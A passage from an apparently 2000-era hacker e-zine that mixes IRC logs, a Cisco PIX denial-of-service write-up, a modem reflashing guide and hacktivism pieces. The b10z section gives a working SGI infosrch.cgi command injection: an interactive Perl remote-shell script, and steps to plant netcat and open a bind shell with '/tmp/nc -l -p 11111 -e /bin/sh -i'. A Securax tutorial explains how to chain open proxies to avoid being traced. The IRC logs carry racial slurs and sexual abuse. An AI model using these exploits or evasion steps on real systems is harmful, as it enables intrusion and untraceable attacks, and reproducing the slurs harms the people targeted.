bible!!! jesusfuck jesus I'm still rushing In #HWA.hax0r.news ... <_655321_> fucking christ man Told you all Christians were insane :P oh christ christ christ, it wasnt that good christ oh jesus In #Legions ... !fuck Christina Aguilera ahh k, I should start some Christianity questions (hopefully that statement did not offend anyone) Zao == Christian hardcore christianity scares me it's Christian hardcore * techn1cs has quit IRC (he dreamed a god up and called it christianity) christ redhat labs droped 3 1/4. christ almighty. christian rock sucks i dont care if you were jesus fucking christ. but don't use Christ's name in vain christian music blows christian, muslim, buddah, jehova.... all the same christ * Becky- has quit IRC (Jesus may love you, but everyone else thinks you're an asshole.) jesus, people upstairz fuqn sound like they r fuqn killing people by hitting them with baseball bats #Jesus unable to rejoin channel (you're banned!) they do not LIKE JESUS I am in JESUS CHAN * shekk is now known as fukJesuS * fukJesuS is now known as jesusblow hehe Nt im opped in #jesus why is it they do not talk about Jesus in #jesus I bet you I could make them talk about Jesus ;P y0 man, i had dis mad dream dat i had anal sex0r with jesus, what do u think it meanz? i never knew jesus was a nigger jesus jesus jesus oh jesus In the (now deceased) #zahack on EFNet ... christ i am pissed off. christ. and how when it was my turn, santa (satan if you concentrate real hard) asked me what i wanted for christmas, and i replied with a big stupid-ass smile, 'A BEAVER!' jesus christ, have u no shame geeezus christ geeezus christ if this is the way my friends repay me for what I do for christ sake what did i miss now. PhreakAZD yes, I believe in God, I am a Christian, though I do not follow organized religion, my Christianity is derived from how I perceieve the bible, not how others do jesus don't start that ? crap again jesus the chances of the sequencing being right must be one in a million jesus jesus JESUS! jesus JEsus chrsist i hate this town jesus u got a bigg rectum jesus jesus jesus man hahahahahaha jesus what a wanker jesus ignore this guy jesus jesus jesus jesus jesus jesus man vortexia, opium told me you look like jesus, now im thinking all weird of you vortexia, yeah, he's right, you're jesus And THAT, ladies and gentlemen, was the international hacking scene's contribution to the institution of Christianity. We hope you enjoyed it, and if you didn't - We don't care. Just leave us alone for Christ's sake. ;-P ;, ,;;4, ,?;;$;,__________________________________________________________________,,7$; __... . . ...__ d$$^^ ^^$$b .?$; ;$$;:;, _. Cisco PIX Denial of Service by Vortexia ._ ,;:;,, _. Hi All, just a bit of a security notification. Cisco has been informed of this problem and Im waiting for a fix for the problem, Ive also noted that various other firewalls are effected by this code, though if you wanna know if whatever you are running is effected, you will have to test it. A brief rundown of the problem. If you run routable ips on your internal interface on your pix, and routeable ips on your external interface, so the pix is not running nat, the pix keeps a state table of everything going on. Anything that is not in your state table that attempts to come in from the outside is denied, even if there is a conduit in place to permit anything. Which means that you have to establish a connection from your internal network to your external network before anything external can send data back. This is a really nice feature, unfortunatly there is a big of a bug that I found in this. While testing on in house equipment for possible flaws, as we continually test various products, I found the following. On recieving a RST packet (TCP Reset) from a given host with the correct source and destination port, the PIX will drop the state entry for that particular connection, which means the tcp connection dies due to the fact that no state entry the external box can no longer talk to the internal box. So, if we take a standard raw ip packet, give it a tcp header, and set the source ip as a machine that your internal box is connected to, and the destination ip as your internal machine, set the source port on the spoofed ip as the port the person is connected to, set your destination port on your destination ip cyclically to possible source ports on his side, and send resets, it will drop the persons state table entry, cutting him off from the box he is connected to. Now, the one question I asked when I wrote this, is why does this work, why is there no seq/ack checking on RST packets, this was answered in the TCP RFC, saying that seq/ack numbers are not checked on RST packets, however they are checked on FIN packets, hence using FIN packets for this test is futile without sequence prediction code. There is a simple work around for this problem however, and anyone wishing to know the details of that is free to email me at andrew@cnsec.co.za for details. Below I have posted example code to show the exploit and how it works, and hopefully this will be useful to someone on this list and help fix a fairly nasty denial of service problem. Many Thanks Andrew Alston Citec Network Securities (Director) Phone: (011) 787 4241 Fax: (011) 787 4259 Email: andrew@cnsec.co.za [Ed: Exploit code can be found in ./kodez/CiscoPIX] ;, ,;;4, ,?;;$;,__________________________________________________________________,,7$; __... . . ...__ d$$^^ ^^$$b .?$; ;$$;:;, _. An Introduction to Java Servlets by Wyzewun ._ ,;:;,, _. Java Servlets are an extremely powerful server side CGI-replacement supported by most major web-servers, and used by very few admins - most notably because they either don't know they exist or don't have the skill needed to write them. Java Servlets have several advantages over Perl and other traditional CGI languages in they are faster to write and to run, infinitely more secure, and have all the advantages of the extremely well furnished Java Servlet API. In this tutorial I will teach you how to write simple Java servlets. Although a knowledge of the Java language is not *completely* necessary to understand this, it will certainly help. What you *will* need is a basic knowledge of the HTTP protocol, of HTML, and of any object-orientated programming language. With that said - let's get going... Servlets are written as if normal programs except they extend the Superclass HttpServlet. We just override the functions doGet(), doPut(), doTrace(), doPost() and doDelete() - the HTTP request each one handles is kinda obvious. =) Right, let's code a simple servlet quick... import javax.servlet.*; // Import the libraries we need to make HTTP import javax.servlet.http.*; // servlets and throw the right exceptions // Here we declare the class and make it extend the HttpServlet Superclass class SimpleExample extends HttpServlet { /* This over-rides doGet() and passes it the user's request (called "req" in this example) and the Servlet's response (called "res" here). Both exceptions thrown are required by the HttpServlet superclass */ void doGet(HttpServletRequest req, HttpServletResponse res) throws ServletException, IOException { // Set HTTP Content Type response.setContentType("text/html"); // Get communicating with the luser PrintWriter out = res.getWriter(); // Send HTML out.println("Servlet Output" + "

FUQ J0O!@#$

"); // Close Stream out.close(); } // end of doGet(); } // end of SimpleExample OK, this issue is being released tomorrow, and a chiq friend of mine bought me a bottle of champagne and a condom for my birthday, so I gotta be honest - I don't have time to finish this article. :) Will make a sequel in future issues if I think anybody cares enough. Cheers... ;, ,;;4, ,?;;$;,__________________________________________________________________,,7$; __... . . ...__ d$$^^ ^^$$b .?$; ;$$;:;, _. Fixing M-Web Specific Modems by JungleG ._ ,;:;,, _. I don't know anything about what I'm about to tell you - I haven't tried it myself. I don't own any Mweb modems, nor do I condone doing this. If you ever try to turn this against me, in any way, I cannot be held responsible and you must pay me 100 million Rand. So, you're sitting there one day and this advert comes on the TV telling you that you can buy a Mweb Net-Getter (sp?) modem for R99. Great you think, this is awesome, I can get myself a 56K modem for only R99, right? Wrong. The Mweb Net-Getter modem are Mweb specific, ie. they only work when you dial into an Mweb POP. Until now. Here's what you do: 1) Find yourself an EPROM writer. Most universities and some security companies have them too. 2) Go to your favourite electronics suplier and buy a 27c2000 EPROM Chip. 3) Find a friend / uncle / relative / boss / etc who has a Fastlink V.90 modem. 4) Open the Fastlink up. remove the EPROM and copy the EPROM from the Fastlink onto your newly Bought 27c2000 EPROM. 5) Close the Fastlink modem up and return it. 5) Open the Mweb modem up and replace the existing EPROM with the newly bought and programmed 27c2000 EPROM. 6) Close the Mweb modem. 7) Plug and Pray. 8) There is no 8 .. I thought 8 looked good though. Easy as that, you now have a 56K V90 modem for R99. Jungle G ;, ,;;4, ,?;;$;,__________________________________________________________________,,7$; __... . . ...__ d$$^^ ^^$$b .?$; ;$$;:;, _. Miscellaneous IRC Gayness ._ ,;:;,, _. heh you a girl? nah, not right now, why? uh somehow that answer strikes me as awkward. hi there lo do u know Back Orifice? never met him It's not a him, it's a program oh ok what is a .tar file? [Ed: She's a #hack netslut - but I s'pose you figured that out already :P] [Ed: More #hack netsluttery...] vans kissing my tits. r u jealous? lol no ive hax0red everyb0dy and now im dealing in pr0n instead đ acid is back!!!!!!!! with PIZZA!!!!!!!!!!!!!!!!!!!! _(@^#^#_!@!@# yay pizza pizza pizza pizza woo hoo omg im gonna order pizza đ jus awaits his pizza [Ed: Cretins :P] if u get someone elses dial up account do u pay telkom? đ GreekGod is pretty good, thnx oh, good do u spit or swallow? excuse me? oh, sorry, wrong window damn right! lol no, only if its really soft wtf! wrong window again! it keeps popping up uhm, just a matter of interest What are you talking about? no, thats too ruff! slower dammit, why does this keep coming? fuck, you are a sick person why the hell does this come in the middle of my conversations? Ugly ... im 17 , hacker dude in training so to speak hacker in training ? this sounds so lame got my good fair share for being spooked the other day pinged www.fbi.gov wow u are so l33t i got to log this port tampering email was send to my isp geez I didnt even connect dumb assies got a warning dumb shit :P some crap about the american embasy being in pretoria and me not being imune to fbi yak yak yak :P hehe harper the unopped ;) hehe *** Harper was kicked by Pneuma (Opped) [Ed: #Darknet elitez...] wtf is gay-boi, he has my STDs!!! rave- : yo there ? shur rave- : can u give me some hints to break in a Apache/1.3.3 (Unix) Debian/GNU on Linux ? [Ed: Have I mentioned how cool #Darknet is, btw?] sup rave send a brotha some more passwd fles [Ed: And while we're at it, have ya seen NXT-Howto.txt by E-Mind of #Darknet?] Section A - What is a DNS? -------------------------- A DNS - Domain Name Server, is used to convert host names to IP addresses and IP addresses to host names. for example: www.infoseek.com = 204.162.96.173 2. What is the theory behind the exploit? The exploit uses a Buffed Overflow in BIND versions 8.2 - 8.2.2 to gain a remote root shell. 6. How do I compile the exploit? As always: $gcc t666.c -o t666 $ 7. How do I run the exploit? $su Password: #./t666 1 Section D - Who should be credited for this HowTo? -------------------------------------------------- 1. who is the person that motivated me into writing this? That person is no other the gov-boi, he operates the great site www.hack.co.za. Without him, this How-To would have never been writen! Thanks Gov-Boi :) [Ed: Needless to say, #darknet are super-fuqn-skilled-kick-yo-azz-hax0rz] ;, ,;;4, ,?;;$;,__________________________________________________________________,,7$; ________,,,........... .........______ $$$$$$$$$˝˝˝˝˝˝˝^^^^^ '''''"""???zz. $$ ^?$$$ `?; $$ '$$ Daar is geen meer jy vokking Skaapnaaier!@#$%^ $;$$$ ?; ,,?;I$$$ ,"________________________________________________________..,,##˝˝˝', $$ _.+ +.,; k-r4d 0h-d4y ju4r3z d1ztrh03z... www.mdma.za.net/fk packetstorm.securify.com/mag/fk Send article submissions, hate mail, pictures of your butt, or whatever to wizdumb@leet.org and/or pneuma@mdma.za.net For automatic delivery of FK to your mailbox as it comes out, subscribe to our mailing list by sending mail to minimalist@security.za.net with "subscribe fk" in the subject of the message. Propz to Jus for setting this up for us, and propz to Mogel of scene.textfiles.com for recommending it. < K-Leet Tail Ascii Goez Here - DOH! > JETZT WERDE ICH IN DEIN ARSCHLOCH EINDRINGEN ALS OB ES POLEN WARE !@#$%^& @HWA 294.0 [b0f] Lamagra's "roothat" hacker wargames, hack legally! ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Site:http://roothat.labs.pulltheplug.com Full details at site, some below. Heres a chance to enter a true hacker challenge, break the levels to get to level 8 the supreme master and don't worry about the ph3dz knocking on yer door! - Ed Games I've been working on some holes for this box and I came up with 7 neat levels. They all handle about a different topic of exploiting. Each level is more difficult than the previous one. The most simple hole is "difficulty" 2, difficulty 0-1 would be a basic argument stack overflow. Every hole is wrapped inside a program that actually has some purpose. The source can be gotten by doing something special with the program. The source will then be printed to stderr (a simple ./program 2> file.c would save it, be sure to remove it quickly). This all sounds pretty big, impressive and really hard, that's why I set up a hintserver to help you with every level. It's source code can be gotten here. It has a small bug in it to get you into level1. The hintserver is running on the port of the old rsh. There are breakpoints after level1, level2 and level5. Each of these levels start a new group and have their own homedir, webpage and password. Inside these groups it's possible to skip a level until later on, BUT to obtain the password of the next group, you have to send in all exploit sources (of all levels in the group) (to lamagra@digibel.org subject: roothat:level:nickname) You can keep your level inside a group with backdoors (cracked backdoors (by me) will be deleted). Game-Rules Passwords and exploits should not be traded/sold/whatever, everyone has to made his/her own exploits (except if you work in groups) At every breakpoint all exploits has to be send in to receive the password The guest account is staying open for people who *don't* want to play, it should not be used by the gamers Backdoors that are easily cracked will be removed It would be nice if backdoors were erased after reaching a breakpoint, since they serve no use anymore(Just a matter of keeping the box clean and the quota down Don't bother the other gamers in any way (DoS, deleting files also removing entries on the webboard Keep everything tidy including the webpages If you break these rules, you'll be instantly banned from the game (not kidding). @HWA 295.0 [HWA] Out of the quagmire, something intersting emerges: b10z crew ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ fucking tests are in the .txt bro peep it out its all fuckin good! werd. Submitted by Cruciphux/d0tslash [14:39] http://b10z.hypermart.net/ [14:42] http://www.pots.gr/projects.html irix cgi rape exploit ~~~~~~~~~~~~~~~~~~~~~ Feeling lucky? 1. Ok shit has changed. No more options. You can fill em in your damn self in the provided boxes. 2. You still must use either %20 or + for space. 3. By default this rapes SGI infosrch.cgi...read up at security focus if you don't know it or put the gay ass phf hole in the cgi option field or some shit. 4. Like you can pick your own proxy too. 5. If the layout looks like shit ... guess what... I DON'T CARE! At least glance at this. binaries. Read the Advisory Happy Hunting \\b10z\\ + d0tslash This text is to explain the 0wnage. nothing more nothing less. compile netcat with #define GAPING_SECURITY_HOLE maybe edit Makefile and replace STATIC=-non_shared with STATIC= upload precompiled nc binary via anonftp If you have a user account you may use this also (what would be the point?). place bin in /tmp chmod 755 the bin. exploit the infosrch.cgi hole to run command: /tmp/nc -l -p 11111 -e /bin/sh -i ^-- added with recompile #define GAPING_SEC... ^--- non privledged port ^---- listen for connection -e option will execute the command you specify upon connection at this point you would telnet to the port to recieve the output of the command...in the above example you recieve a lame bindshell. type your command followed by ; viola a bunk ass nobody shell, or if the admin was slippin r00t shell. believe it or not there are a few out there running a www or root. Please see README.httprape (10 + ./) Advisory (Securityfocus) SGI InfoSearch fname Vulnerability bugtraq id 1031 object infosrch.cgi (exec) class Input Validation Error cve CVE-2000-0207 remote Yes local Yes published March 05, 2000 updated May 23, 2000 vulnerable SGI InfoSearch 1.0 + SGI IRIX 6.5 SGI IRIX 6.5.7 SGI IRIX 6.5.6 SGI IRIX 6.5.4 SGI IRIX 6.5.3m SGI IRIX 6.5.3f SGI IRIX 6.5.3 SGI IRIX 6.5.2m SGI IRIX 6.5.1 SGI IRIX 6.5 not vulnerable SGI IRIX 6.5.8 SGI IRIX 6.2 SGI InfoSearch fname Vulnerability The InfoSearch package converts man pages and other documentation into HTML web content. The search form uses infosrch.cgi which does not properly parse user input in the 'fname' variable, allowing commands to be executed at the webserver privilege level by remote web users. http ://target/cgi-bin/infosrch.cgi?cmd=getdoc&db=man&fname=|/bin/id /data/vulnerabilities/exploits/infosh.pl #!/usr/bin/perl -w # infosearch.cgi interactive shell. # usage: ./infosh.pl hostname # 3/4/00 # --rpc use IO::Socket; use CGI ":escape"; $|++; die "usage: $0 host\n" unless(@ARGV == 1); ($host) = shift @ARGV; $cgi = "/cgi-bin/infosrch.cgi?cmd=getdoc&db=man&fname=|"; # url encode and send a command. sub send_cmd { my($url_command) = $cgi . CGI::escape(shift); $s = IO::Socket::INET->new(PeerAddr=>$host,PeerPort=>80,Proto=>"tcp"); if(!$s) { die "denied.\n"; } print $s "GET $url_command HTTP/1.0\r\n"; print $s "User-Agent: \r\n\r\n"; @result = <$s>; shift @result until $result[0] =~ /^\r\n/; # uninteresting data. shift @result; $#result--; return @result; } # draw a pseudo prompt. i like "\h:\w \$ ". sub prompt { @res = send_cmd("/sbin/pwd"); chomp($pwd = $res[0]); print "$host:", $pwd, "\$ "; } prompt; while(!eof(STDIN)) { chomp($cmd = ); print send_cmd($cmd); prompt; } From the SGI Advisory (attached in full in the 'Credit' section): Although patches are available for this issue, it is realized that there may be situations where installing the patches immediately may not be possible. The steps below can be used to disable the infosrch.cgi(1) program to prevent exploitation of this vulnerability until patches can be installed. 1) Become the root user on the system. % /bin/su - Password: # 2) Change the permissions on the infosrch.cgi(1) program. ================= **** WARNING **** ================= Removing the permissions from the infosrch.cgi(1) program will prevent non-root users from using the Infosearch subsystem through the HTTP web server. # /bin/chmod 500 /usr/lib/infosearch/bin/infosrch.cgi 3) Return to previous level. # exit % --- For another workaround, see "Re: Vulnerability in infosrch.cgi" in Credit. SGI IRIX 6.5.6: SGI upgrade Maintenance Releases http://support.sgi.com/colls/patches/tools/relstream/index.html Upgrade to the latest Maintenance Release of IRIX 6.5.x here. SGI IRIX 6.5.4: SGI upgrade Maintenance Releases http://support.sgi.com/colls/patches/tools/relstream/index.html Upgrade to the latest Maintenance Release of IRIX 6.5.x here. SGI IRIX 6.5.3m: SGI upgrade Maintenance Releases http://support.sgi.com/colls/patches/tools/relstream/index.html Upgrade to the latest Maintenance Release of IRIX 6.5.x here. SGI IRIX 6.5.3f: SGI upgrade Maintenance Releases http://support.sgi.com/colls/patches/tools/relstream/index.html Upgrade to the latest Maintenance Release of IRIX 6.5.x here. SGI IRIX 6.5.3: SGI upgrade Maintenance Releases http://support.sgi.com/colls/patches/tools/relstream/index.html Upgrade to the latest Maintenance Release of IRIX 6.5.x here. SGI IRIX 6.5.2m: SGI upgrade Maintenance Releases http://support.sgi.com/colls/patches/tools/relstream/index.html Upgrade to the latest Maintenance Release of IRIX 6.5.x here. SGI IRIX 6.5.1: SGI upgrade Maintenance Releases http://support.sgi.com/colls/patches/tools/relstream/index.html Upgrade to the latest Maintenance Release of IRIX 6.5.x here. SGI IRIX 6.5: SGI upgrade Maintenance Releases http://support.sgi.com/colls/patches/tools/relstream/index.html Upgrade to the latest Maintenance Release of IRIX 6.5.x here. credit Posted to Bugtraq on March 5, 2000 by rpc . reference advisory: 20000501-01-P: Vulnerability in infosrch.cgi (SGI) message: infosrch.cgi vulnerability (IRIX 6.5) (rpc ) message: Re: Vulnerability in infosrch.cgi (Jose Nazario ) 296.0 [MM] Cnet:AltaVista credits players $1 after contest error ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://news.cnet.com/news/0-1007-202-2236499.html AltaVista credits players $1 after contest error By Greg Sandoval Staff Writer, CNET News.com July 10, 2000, 4:30 p.m. PT URL: http://news.cnet.com/news/0-1007-200-2236499.html Thousands of people who were told erroneously that they had won $500 worth of shopping credit on AltaVista last week are only going to get credit worth a single dollar, the company said. "Our situation is very much like when a bank mistakenly deposits money into your account. It's not yours to keep. I think people understand that," AltaVista spokesman David Emanuel said. AltaVista is giving 1000 points, which equals a dollar's worth of credit, to anyone who participated in the company's Rewards Program contest between July 2 and July 4. It was during that period that some visitors discovered that the Web portal's computer system would bring up a "winner notice" if the contest page was refreshed several times, AltaVista said. But dozens of enraged contest participants on almost a half dozen message boards say they disagree with the company's version of what happened. They say they received notices without ever hitting the refresher key. "I have no sympathy for the people who forced it to display a winner page," said player Jay Battmer in an email to CNET News.com. "But it was pretty rough on those who played the game honestly and won nothing." Many players called for AltaVista to honor all the winning notices, saying the company made the error and should stand by the word of its notices, erroneous or not. Emanuel said there were 20 legitimate winners each day during that period who have received their $500 credit. The others, regardless of whether the person won by tinkering with the system, were incorrectly notified and are not entitled to share in the winnings. In accordance with the rules of the Instant Win game a member is eligible to play the game once per day by clicking the link to the game page one time only, according to a copy of a letter AltaVista sent to players. AltaVista has apologized for the error and said it hopes the 1000 points will be a step toward comforting those who thought they had won the $500 in credit. "We have over 300,000 valued customers in our rewards program," Emanuel said. "We have corrected the mistake. When we've explained what happened, that it was a mistake, people seem to understand." @HWA 297.0 [HWA] Securax "socksploitation" tutorial ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +----------------------+----------------------------------------------------+ | SECURAX TUTORIAL | ANONYMOUS CONNECTIONS OVER THE NET: | | | Socks Chains in Windows | +----------------------+----------------------------------------------------+ | written by Zoa_Chien | HTML version with screenshots available at | | design by nostalg1c | http://www.securax.org/ZC/anon/ | +----------------------+----------------------------------------------------+ http://www.socks.nec.com/50001224/sc32b206.exe __/ introduction \___________________________________________________________ this tutorial is an attempt to help you re-route all internet winsock applications in ms windows trough a socks chain, thus making your connections much more anonymous. __/ theory \_________________________________________________________________ the more different hops you make your data jump, the more difficult it will be to trace it back. take this route for example: you --> socks1 --> socks2 --> socks3 --> ... --> socksx --> target people who want to trace you will have to contact x persons to ask their them for their logs. chances are one of them didn't log... and if they logged, the ip seen by each host/socks is the ip of the previous host/socks in the chain. this works for: . icq-like tools . ftp clients . mail clients . telnet clients . portscanners . (just about anything that uses the internet) it doesn't work on most irc servers since they often check for open wingates and proxies. __/ now let's do it \________________________________________________________ - first you need to find some boxes running wingate we look for wingates since the default installation of wingate includes a non-logging socks server on port 1080 visit http://proxys4all.cgi.net/win-tel-socks.shtml or http://www.cyberarmy.com/lists/wingate/ for some wide-known wingate ips, or even better: you could try to find some yourself. to do this, i would suggest you use 'proxy hunter', available for download at http://www.securax.org/ZC/anon/proxyht300beta5.exe be sure to look for wingates (port 23) and not for socks, as we only want wingate socks. you could also use wingatescan, available for download at http://www.securax.org/ZC/anon/wgatescan-22.zip speed is very important since we will be using multiple socks, and we don't want our programs to time out. with the klever dipstick tool, you can find out which are the fastest ones. (get the klever dipstick program at http://klever.net/kin/static/dipstick.exe) Just fire off Dipstick. Rightclick in the small green rectangular and choose Show main window. To import a list of wingates, just click on Advanced, choose Import List and select your file. You can also manually ping a simple host by clicking on Manual Ping. Use those wingates with the smallest average time. *duh* - second, check if the wingates from the list are actually running :) there are a lot of programs that can help you with this, one of them is server 2000, available for download at http://freespace.virgin.net/david.wood6/Server/Server.htm - third, install a program that will intercept all outgoing networking calls. i use the great tool sockscap for this purpose. you can get it at http://www.socks.nec.com/sockscap.html in the setting, enter this as socks server : 127.0.0.1 port 8000. click on 'socks version 5'. click 'resolve all names remotely'. uncheck 'supported authentication'. in the main window, choose new and then browse to create a shortcut for the internet client you want to give socks support. repeat this step for every program you want. - install socks chainer download it at http://www.ufasoft.com/socks in the service menu, click on new. enter 'Chain' as name and '8000' as port to accept connections on. click on new and fill in the ips of the fastest wingates you found, but this time, use port 1080 for this (and not the port 23) using the '<' and '>', you can add and remove socks. be sure to test all socks one by one before adding them all to the list in once, because if one of them is bad, you chain will not work and you will not be able to locate the bad socks in the chain. if all of them seem to work, you use the '<' key to add them all (mind speed problems. 4 or less is fine. i think 10 or 13 is the limit put by tcp/ip) __/ testing your anonymous setup \___________________________________________ to check what socks your computer is connecting to, you can use x-ploiters totostat (http://idirect.tucows.com/files/totostat_install.exe). look for connections to port 1080, the remote ip found there should be the first ip found in your chain in sockschain. use the shortcut in sockscap that points to your browser, and connect to http://cavency.virtualave.net/cgi-bin/env.cgi or http://internet.junkbuster.com/cgi-bin/show-http-headers use your shortcut in sockcap to start your telnet client then telnet to ukanaix.cc.ukans.edu you can also use https://sites.inka.de:8001/cgi-bin/pyca/browser-check.py to test ssl or ftp.zedz.net to verify your ip via ftp. in all the above cases, the remote server should show you the ip of the last server in the sockschain. if you look at the sockschain program while surfing you should see the chain being built up. __/ some final remarks \____________________________________________________ never use internet explorer to do tricky stuff as it might reveal your ip. my personal favorite browser is opera 4.0 (http://www.opera.com/) if you looked carefully to what is displayed when you go to the http://internet.junkbuster.com/cgi-bin/show-http-headers page, you might have noticed that a lot of stuff about our client is being sent. to avoid this, we could install another proxy between the sockscap and the sockschainer proxy that would filter out those things. A4proxy is an example of a proxy capable of doing such things. remember, if you want to do the real stuff, better switch to linux. Zoa_chien, 22/5/error #securax on EFNET 298.0 [IND] Hacktivism: Hacktivismo with cDc ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://cultdeadcow.com/hacktivismo.html We are HACKERS and we are HACKTIVISTS. Our mandate is to keep the Internet free, healthy, and adventurous. We will not be bullied. HACKTIVISTS are not the ones who decided to shackle free speech and the open exchange of ideas. We believe in the 19th Article of the United Nations Declaration on Human Rights. We believe in the dignity of all human beings. And we believe in loud music and big parties. Start reading. Start thinking. Start acting. *** Below is a response to the Electrohippies rationale for supporting DDoS attacks. Please take the time to visit their site and make up your own mind. Key concepts: Electrohippies, anticorporatism, packet wankers, Denial of Service (DoS), Freedom of Expression, hacktivism versus [h]activism. One Liner: The Electrohippies are trying to rationalize Denial of Service attacks and violate the First Amendment privileges of their opponents. Links: http://www.gn.apc.org/pmhp/ehippies/ Electrohippies Web site http://www.gn.apc.org/pmhp/ehippies/files/op1.htm Occasional paper no.1 Client-side Distributed Denial-of-Service: valid campaign tactic or terorrist act? The Electrohippies have published an occasional paper (EOP) that asks whether their recently published DoS application is a valid campaign tactic or a terrorist act. After introducing a quote from the New Testament that transmogrifies Jesus Christ into a packet wanker scourging the Internet of E-commerce, the question is then answered with an argument that crucifies all common sense. This essay will address several errors from the EOP that require correction. [All quotes taken from the EOP and appear sequentially] "As Jesus ransacked the temple in Jerusalem because it had become a house of merchandise, so the recent [DDoS] attacks on e-commerce web sites are a protest against the manner of it’s [sic] recent development". This is the first and most egregious error that the Electrohippies make. It betrays their lack of understanding of hacker culture; it also creates a false bridge to their own anticorporate bias. As no statement of claim was made by the DDoS perpetrators, left-leaners, Adbuster sympathizers and wishful thinkers projected their own raison d’etre onto the event to construct an illusory foundation for their personal projects. In fact the DDoS attacks of early February were nothing more than packet wanking at its finest, or as hackers would say, going for the full woody. It was irrelevant that the targeted sites were commercial and had e-commerce components. They could just have easily have been the Vatican, a Britney Spears fan site, or Aunt Beulah’s Jam page, that is, if those sites represented the same level of prestige and notoriety as the actual targets. There’s a lot of juice in the packet wanking world associated with taking down a large site. It has nothing to do with e-commerce no matter what the Electrohippies, The Village Voice or other projectionists wish were the case. "Whatever the views of particular people about the development of e-commerce on the ‘Net [sic], we must not ignore the fact that as another part of society’s public space the Internet will be used by groups and individuals as a means of protest. There is no practical difference between cyberspace and the street in terms of how people use the ‘Net [sic]". E-commerce is a technology. It is used across the board by not-for-profit groups, independent record companies, and transnational corporations. It is this last group, one assumes, that the Electrohippies take issue with. But there is no effective difference between this method of exchange and the use of cash or credit off-line. By attacking e-commerce the Electrohippies create the impression that they are Luddites when what they mean to say is that they are anticorporate. Like many people, the Electrohippies have been confused by technology. They are trying to filter their agenda through the Internet rather than focussing on first principles. The Electrohippies further compound their misunderstanding of the Internet by assuming that the same rules hold in the digital realm as they do down on the street. They do not. Where a large physical mass is the currency of protest on the street, or at the ballot box, it is an irrelevancy on the Internet. Or more correctly, it is not always necessary. Of course many people can make a difference on the Internet if one is talking about site traffic. High visitation boosts domain value; conversely its absence will decrease it. But to think that it takes a lot of people to execute an act of civil disobedience on the Internet is naiive. Programs make a difference, not people. And and as a last thought, I know from personal experience that there is a difference between street and on-line protest. I have been chased down the street by a baton-wielding police officer on horseback. Believe me, it takes a lot less courage to sit in front of a computer. "…the difference between the two actions [DDoS packet wanking and the WTO on-line protests in which the Electrohippies participated] is the one of poplular legitimacy versus individual will. The structure of the client-side distributed actions developed by the electrohippies means that there must be widespread support across a country, or continent in order to make the system work. Our method has built within it the guarantee of democratic accountability". The Electrohippies are laboring under several false assumptions here. They believe that there is some nexus between their on-line actions against the WTO and the DDoS attacks against Yahoo, et al – there is not. And they think that somehow if many people perpetrate a DoS attack as opposed to just one, then that is, ethically speaking, a better thing. Bollocks. Denial of Service, is Denial of Service, is Denial of Service, period. The only difference between a program like Stacheldraht [a DDoS application written by The Mixter] and the client side javascript program written by the Electrohippies is the difference between blowing something up and being pecked to death by a duck. And if numbers lend legitimacy - as the Electrohippies propose - then the lone bomber who tried to assassinate Hitler in his bunker was wrong and the millions who supported the dictator were right. If the Electohippies wish to take actions that involve large groups then they should leverage their supporters against their targets in more practical ways. For instance. Let’s say the Electrohippies take exception to the business practice of a large transnational that exploits child labour in developing countries. And let's say that this same transnational has an e-commerce enabled Web site selling its merchandise. So if the Electrohippies were to organize fifty thousand people to make a purchase from said Web site, then return the item with a letter of protest and a demand for a refund, then they might lodge a protest with the transnational that it would seek to remedy. This particular suggestion would have to be tweaked according to the target but it makes the point. Creating an intolerable snag in running a business is a far more productive use of protest action than disabling a Web server for a short time, the ethics of such notwithstanding. "the electrohippies collective believe that the acts or views perpetrated by the targets of a DoS action must be reprehensible to many in society at large, and not just to a small group. It is on this basis that the collective undertook the action against the WTO during their conference in Seattle, and it is also the basis upon which we are planning future actions". Denial of Service attacks are a violation of the First Amendment, and of the freedoms of expression and assembly. No rationale, even in the service of the highest ideals, makes them anything other than what they are -- illegal, unethical, and uncivil. One does not make a better point in a public forum by shouting down one’s opponent. Say something more intelligent or observe your opponents' technology and leverage your assets against them in creative and legal ways. Hacktivism is about using more eloquent arguments – whether of code or words – to construct a more perfect system. One does not become a hacktivist merely by inserting an "h" in front of the word activist or by looking backward to paradigms associated with industrial organization. One does so by living in the present and recognizing reality. We live in a post-Newtonian universe although too many people are unaware of this. There is still talk of left and right, of a centre to the margins sensibility. This world was blown apart by Einstein. The universe is no longer explosive, it is implosive. And to take part in social and political discussions one most move inward to the centre rather than outward to the extremes. Being a centrist is the new reality; everything else is reactionary. While the Electrohippies cannot be faulted for their dedication and good intentions, we all know how the road to hell is paved. And if the they are as dedicated to the Scriptures as they appear to be, then let them ponder this. The fear of the LORD is the beginning of knowledge: but fools despise wisdom and instruction. -- Proverbs, I v7. I don’t think that the Electrohippies are fools. -- oxblood ruffin!cDc foreign minister "cDc. We put the hack into hacktivism" @HWA 299.0 [IND] Hacktivism: GForce using website defacements to spread their word ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ You have seen the high profile sites on Attrition that have been defaced by GForce, SugarKing from HWA Staff interviews GForce members for a closer look into why they do it. (c)2000 SugarKing/HWA.hax0r.news if reprinted please include the source http://welcome.to/HWA.hax0r.news [20:59] SugarKing: So we can start the interview ;) [20:59] sure [20:59] alright, is this everyone you want present? [21:00] yes, most of other guy's arn't on, some are busy, and it's very early here. [21:00] yeah [21:01] ok, you don't have to answer any question if you don't want to... [21:01] ok [21:02] so lets begin:) [21:02] yep [21:02] ok first off, how many members are there, and who are they? [21:03] *** sniper- is now known as sniper__ [21:03] ehehe [21:03] heh [21:03] services sux [21:03] There are about 5 members, they are myself, miller, rave-, heataz, and instinct atm [21:03] ok [21:04] when was the group founded and by who? [21:04] It's was founded about a year ago, and by myself, heataz and miller [21:05] what was your sole purpose of starting the group? for the reasons you name in your defacments? [21:06] GForce was born out of hate and contempt for violence, atrocities and human rights violations against Muslims, specially the affectees in Kashmir [21:06] t was precipitated to bring the attention of world leaders and organizations to the issue in cyberspace which is today the leading source of communication. The motive behind the 